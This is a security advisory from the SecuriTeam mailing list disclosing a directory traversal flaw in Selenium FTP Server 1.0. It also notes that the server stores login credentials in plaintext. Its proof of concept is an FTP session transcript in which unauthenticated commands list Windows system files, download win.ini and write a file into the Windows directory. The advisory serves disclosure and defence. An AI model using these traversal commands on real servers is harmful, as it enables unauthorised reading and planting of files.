[NT] Selenium FTP Server Directory Traversal



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Selenium FTP Server Directory Traversal
------------------------------------------------------------------------


SUMMARY

<http://bibasoftware.com/?page_id=15> Selenium FTP Server is vulnerable
to a directory transversal input validation error in which a remote
unauthenticated user can issue using the DIR, LIST, NLST, etc commands to
display any file on the remote server or use the GET/RECV command to
retrieve any file outside the FTP root and the PUT/SEND to write to any
location on the remote server.

DETAILS

Vulnerable Systems:
* Selenium FTP Server version 1.0

Proof of concept:
C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 68096 May 02 2005 agrsmdel.exe
-rwxrwxrwx 1 ftp ftp 44544 Jun 02 1998 clspack.exe
-rwxrwxrwx 1 ftp ftp 1032192 Aug 04 2004 explorer.exe
-rwxrwxrwx 1 ftp ftp 10752 May 26 2005 hh.exe
-rwxrwxrwx 1 ftp ftp 306688 Oct 29 1998 IsUninst.exe
-rwxrwxrwx 1 ftp ftp 112640 Jul 01 2001 lsb_un20.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad1.exe
-rwxrwxrwx 1 ftp ftp 146432 Aug 04 2004 regedit.exe
-rwxrwxrwx 1 ftp ftp 46352 Feb 28 2003 setdebug.exe
-rwxrwxrwx 1 ftp ftp 286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx 1 ftp ftp 32866 Aug 04 2004 slrundll.exe
-rwxrwxrwx 1 ftp ftp 46592 Aug 02 2002 SOUNDMAN.EXE
-rwxrwxrwx 1 ftp ftp 73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx 1 ftp ftp 15360 Aug 04 2004 taskman.exe
-rwxrwxrwx 1 ftp ftp 90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx 1 ftp ftp 49680 Aug 04 2004 twunk_16.exe
-rwxrwxrwx 1 ftp ftp 25600 Aug 04 2004 twunk_32.exe
-rwxrwxrwx 1 ftp ftp 299520 Mar 23 1999 uninst.exe
-rwxrwxrwx 1 ftp ftp 107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx 1 ftp ftp 86016 Dec 17 1999 unvise32.exe
-rwxrwxrwx 1 ftp ftp 256192 Aug 04 2004 winhelp.exe
-rwxrwxrwx 1 ftp ftp 283648 Aug 04 2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get ..\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for ..\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt ..\windows\toobad.txt
200 Port command successful.
150 Opening data connection for ..\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.

Furthermore the software improperly writes any username/password that
might be used to login to the program in plaintext to the file[s] stored
in the default directory of C:\Program Files\BiBa SOFTWARE\Selenium
Server\Servers


ADDITIONAL INFORMATION

The information has been provided by <mailto:glinares.code@xxxxxxxxx>
Greg Linares.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Microsoft wininet.dll FTP Reply Null Termination Heap Corruption Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft 'wininet.dll' FTP Reply Null Termination Heap Corruption ... Windows Server 2003 Enterprise Edition SP1 ... This vulnerability appears to have existed from at least Internet ...
    (Securiteam)
  • [EXPL] CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... FTP program that makes it easy to drag and drop files to and from your ... CoffeeCup FTP to execute arbitrary code. ... direct | free "direct" to exploit a CoffeeCup Direct FTP client ...
    (Securiteam)
  • [UNIX] FTP Kioslave Command Injection
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... KDE applications which use the FTP kioslave, e.g. Konqueror, allow remote ... The FTP kioslave can be misused to execute any ftp command on the server ...
    (Securiteam)
  • [NT] ArGoSoft FTP Server XCMD Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ArGoSoft FTP Server is ...
    (Securiteam)
  • [NEWS] Multiple Vulnerabilities in the QNX Platform
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... QNX 6.1 FTP client is vulnerable to a format string in 'quote' command. ... Memory fault ... there is a theoretical race condition vulnerability. ...
    (Securiteam)